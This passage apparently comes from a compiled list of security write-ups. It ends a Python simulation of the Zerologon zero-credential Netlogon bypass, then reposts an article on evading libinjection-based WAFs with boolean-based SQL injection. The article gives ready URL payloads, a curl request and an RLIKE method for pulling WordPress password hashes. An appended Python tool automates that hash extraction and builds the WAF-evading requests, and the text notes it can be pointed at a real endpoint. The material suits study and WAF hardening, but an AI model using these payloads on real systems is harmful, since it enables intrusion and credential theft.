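        out.append(c ^ keystream_byte)
        register = register[1:] + bytes([c])
    return bytes(out)


def compute_netlogon_credential(session_key, challenge):
    """The flawed primitive: CFB8 over the 8-byte challenge with a FIXED zero IV."""
    return cfb8_encrypt(session_key, ZERO_IV, challenge)


def derive_session_key(machine_secret, client_challenge, server_challenge):
    """Stand-in for the session-key derivation (assumption): HMAC-SHA256 of both
    challenges under the machine account secret, truncated to 16 bytes."""
    mac = hmac.new(machine_secret, client_challenge + server_challenge, hashlib.sha256)
    return mac.digest()[:BLOCK_SIZE]


class NetlogonServer:
    def __init__(self, machine_secret, rng, reject_weak_challenges=False):
        self.machine_secret = machine_secret
        self.rng = rng
        self.reject_weak_challenges = reject_weak_challenges

    def authenticate(self, client_challenge, client_credential):
        """One ServerReqChallenge + ServerAuthenticate round collapsed into a call.
        The server picks a fresh random challenge each time, so every attempt gets
        a fresh session key the attacker never learns and never needs."""
        if self.reject_weak_challenges and len(set(client_challenge[:5])) == 1:
            # Illustrative hardening (assumption, not the vendor patch): refuse
            # challenges whose leading bytes all repeat, which the zero challenge does.
            return False
        server_challenge = bytes(self.rng.getrandbits(8) for _ in range(8))
        session_key = derive_session_key(self.machine_secret, client_challenge, server_challenge)
        expected = compute_netlogon_credential(session_key, client_challenge)
        return hmac.compare_digest(expected, client_credential)


def zerologon(server, max_attempts=4096):
    """Send ClientChallenge = ClientCredential = 00..00 until the server accepts.
    Returns the attempt number that succeeded, or None. Expected ~256 attempts;
    the chance of 4096 failures in a row is (255/256)^4096, about 1e-7."""
    zeros = bytes(8)
    for attempt in range(1, max_attempts + 1):
        if server.authenticate(zeros, zeros):
            return attempt
    return None


def make_dc(seed, hardened=False):
    """Constructed domain controller with a fixed machine secret and seeded RNG."""
    return NetlogonServer(b"machine-account-secret", random.Random(seed), reject_weak_challenges=hardened)


if __name__ == "__main__":
    print("vulnerable DC accepted zero credential on attempt", zerologon(make_dc(2020)))
    print("hardened DC accepted on attempt", zerologon(make_dc(2020, hardened=True)), "(None = never)")
```

The point to take from the model is that the defect is the fixed IV, not the attacker's knowledge of anything: each attempt is an independent 1/256 coin flip against a key the attacker never sees, which is why the real exploit completes in seconds and why Secura's test tool can detect the condition without credentials.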
  25. Advanced boolean-based SQLi filter bypass techniques
Learn how to bypass filters and Application Firewall rules using MySQL String Functions, Regex Functions, Conditional Select and Set Variables to exploit a blind (boolean-based) SQL Injection vulnerability.

This article aims to show you some techniques to exploit a SQL Injection vulnerability while bypassing libinjection (running inside a Web Application Firewall). libinjection is an open-source SQL / SQLi tokenizer, parser and analyzer created by Nick Galbreath from Signal Sciences that aims to detect SQL Injection and XSS payloads. libinjection runs in many Web Application Firewalls because it performs better than a regular-expression-based ruleset. It works well and detects many SQLi payloads, but it can be bypassed by using specific SQL syntax such as MySQL string functions or conditional select.

Let's take a look at the following request, which tries to check whether the parameter id is injectable with SQL syntax:

/index.php?id=1+AND+1=1

It is successfully identified by libinjection as an SQLi attempt. You can use a list of Arithmetic Operators, String Functions and Conditional Select syntaxes to bypass it.

Arithmetic operators

Suppose you need to check a parameter with the numeric value 2 in order to see if it's vulnerable to SQL Injection. You can do so by replacing the number 2 with an arithmetic operation. For example (note that + must be URL-encoded as %2b, since a raw + in a query string decodes to a space):

  OPERATOR  DESCRIPTION       EXAMPLE         INJECTION
  +         Addition          select 1 + 1    /index.php?id=1%2b1
  -         Subtraction       select 3 - 1    /index.php?id=3-1
  *         Multiplication    select 2 * 1    /index.php?id=2*1
  /         Division          select 2 / 1    /index.php?id=2/1
  DIV       Integer Division  select 2 DIV 1  /index.php?id=2+DIV+1

String Functions

libinjection intercepts most classic SQLi attempts like 1+OR+1=1 but, speaking of MySQL, it's possible to bypass its filters by using MySQL functions (MySQL requires whitespace after the -- comment marker, so in a URL you would typically send --+ or --%20):

INSERT: Insert substring at specified position up to n characters
/index.php?id=1+OR+1=insert(1,1,1,1)--
REPEAT: Repeat a string the specified number of times
/index.php?id=1+OR+1=repeat(1,1)--
REPLACE: Replace occurrences of a specified string
/index.php?id=1+OR+1=replace(1,1,1)--
RIGHT: Return the specified rightmost number of characters
/index.php?id=1+OR+1=right(1,1)--
WEIGHT_STRING: Return the weight string for a string
/index.php?id=1+OR+weight_string("foo")=weight_string("foo")--
IF statement: Implements a basic conditional construct
/index.php?id=IF(1,1,1)--

Expression and Comments to Bypass

As you might know, a useful technique that can help in bypassing filters is to insert comments inside the SQL syntax, such as sEleCt/*foo*/1. This kind of payload is well blocked by WAFs that use libinjection, but the following syntax seems to bypass it:

{`<string>`/*comment*/(<sql syntax>)}

For example, in a real scenario:

curl -v 'http://wordpress/news.php?id=\{`foo`/*bar*/(select+1)\}'

Some other examples:

  EXAMPLE                                                      INJECTION
  select login from users where id={`foo`/*bar*/(select 2)};   /index.php?id={`foo`/*bar*/(select+2)}
  select login from users where id={`foo`/*bar*/(select--2)};  /index.php?id={`foo`/*bar*/(select--2)}
  select login from users where id={`foo`/*bar*/(select+2)};   /index.php?id={`foo`/*bar*/(select%2b2)}

In a real scenario, if you find a boolean-based SQL Injection, for example in a vulnerable WordPress plugin, and you need to bypass a WAF using libinjection to exploit it, you can brute-force and exfiltrate the password hash of a user with the following payload:

/index.php?id={`foo`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"(^)[$].*"+limit+1)}

In this case, the RLIKE operator lets me brute-force the hashed password value by checking the response body length after adding characters to the regular expression. For example (using any web fuzzing tool):

RLIKE "(^)[$].*" -> returns ok (hash: $)
RLIKE "(^)[$][a].*" -> error or different response body length
RLIKE "(^)[$][b].*" -> error or different response body length
RLIKE "(^)[$][c].*" -> returns ok (hash: $c)
RLIKE "(^)[$][c][a].*" -> error or different response body length
RLIKE "(^)[$][c][b].*" -> error or different response body length
RLIKE "(^)[$][c][c].*" -> returns ok (hash: $cc)
etc...

Assignment Operators

The := assignment operator causes the user variable on the left-hand side of the operator to take on the value to its right. The value on the right-hand side may be a literal value, another variable storing a value, or any legal expression that yields a scalar value, including the result of a query (provided that this value is a scalar value). You can perform multiple assignments in the same SET statement. Unlike =, the := operator is never interpreted as a comparison operator. This means you can use := in any valid SQL statement (not just in SET statements) to assign a value to a variable.

We can combine all the syntaxes shown before (Expression, Comments, RLIKE and the Assignment Operator) too (thanks to @seedis https://github.com/seedis). For example:

/index.php?id=@foo:=({`if`/*bar*/(select+1+from+wp_users+where+user_pass+rlike+"^[$]"+limit+1)})+union+%23%0a+distinctrow%0b+select+@foo

This requires more explaining:

[screenshot: select id=1 by injecting SQL query]
[screenshot: select id=2 by injecting SQL query]

References

https://dev.mysql.com/doc/refman/8.0/en/arithmetic-functions.html
https://dev.mysql.com/doc/refman/5.7/en/expressions.html
https://dev.mysql.com/doc/refman/8.0/en/assignment-operators.html
https://github.com/coreruleset/coreruleset/issues/1167

theMiddle - OWASP Core Rule Set Developer, Co-Founder at Rev3rse Security, I ❤️ to break application firewalls.

Source: https://www.secjuice.com/advanced-sqli-waf-bypass/
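The RLIKE character-by-character brute force described above, as an added example that is not code from the original article: a Python driver that grows the bracket-class regex one character at a time and asks a boolean oracle whether the prefix still matches, and that emits the article's {`foo`/*bar*/(...)} wrapper around each query. The oracle is a local stand-in (an assumption): a constructed phpass-style hash checked with Python's re module, which agrees with MySQL RLIKE for these simple anchored bracket classes. Against a real target, local_oracle would be replaced by an HTTP request plus the response-length comparison the article describes. The wp_users/user_pass names come from the article; the function names are mine.

```python
import re

# Characters that can appear in a phpass ($P$...) or bcrypt ($2y$...) hash.
HASH_ALPHABET = "$./" + "0123456789" + "abcdefghijklmnopqrstuvwxyz" + "ABCDEFGHIJKLMNOPQRSTUVWXYZ"


def bracket(ch):
    """Wrap one character in a regex bracket class, escaping the few characters
    that are special inside [...]. '$' and '.' are literal inside a class, which
    is why the article's payload uses [$] rather than a backslash escape."""
    if ch in "\\]^-":
        return "[\\" + ch + "]"
    return "[" + ch + "]"


def prefix_regex(prefix):
    """'(^)' anchor, one bracket class per known character, then '.*'."""
    return "(^)" + "".join(bracket(c) for c in prefix) + ".*"


def build_payload(regex, table="wp_users", column="user_pass"):
    """The article's libinjection-evading wrapper inside the id parameter."""
    inner = f'select+1+from+{table}+where+{column}+rlike+"{regex}"+limit+1'
    return "/index.php?id={`foo`/*bar*/(" + inner + ")}"


def make_local_oracle(stored_hash):
    """Stand-in for the vulnerable endpoint (assumption): True when the regex
    matches the constructed hash, i.e. the 'ok' response instead of the
    'error or different body length' response."""
    def local_oracle(regex):
        return re.search(regex, stored_hash) is not None
    return local_oracle


def extract_hash(oracle, alphabet=HASH_ALPHABET, max_len=64):
    """Boolean-based recovery of the first matching row's hash, one character
    per confirmed guess. Returns (recovered_string, number_of_oracle_queries)."""
    recovered = ""
    queries = 0
    while len(recovered) < max_len:
        for ch in alphabet:
            queries += 1
            if oracle(prefix_regex(recovered + ch)):
                recovered += ch
                break
        else:
            break  # no character extends the prefix: end of the value reached
    return recovered, queries


if __name__ == "__main__":
    stored = "$P$BxYz./9abCDE"  # constructed phpass-style value, not a real hash
    value, n = extract_hash(make_local_oracle(stored))
    print(f"recovered {value!r} with {n} oracle queries")
    print("example request:", build_payload(prefix_regex("$c")))
```

Two practical caveats the article leaves implicit: the alphabet must cover every character the stored value can contain, or extraction stops early at the first unknown character, and MySQL 8.0 switched RLIKE to the ICU regex engine, so anything beyond plain anchored bracket classes should be re-tested against the target's version.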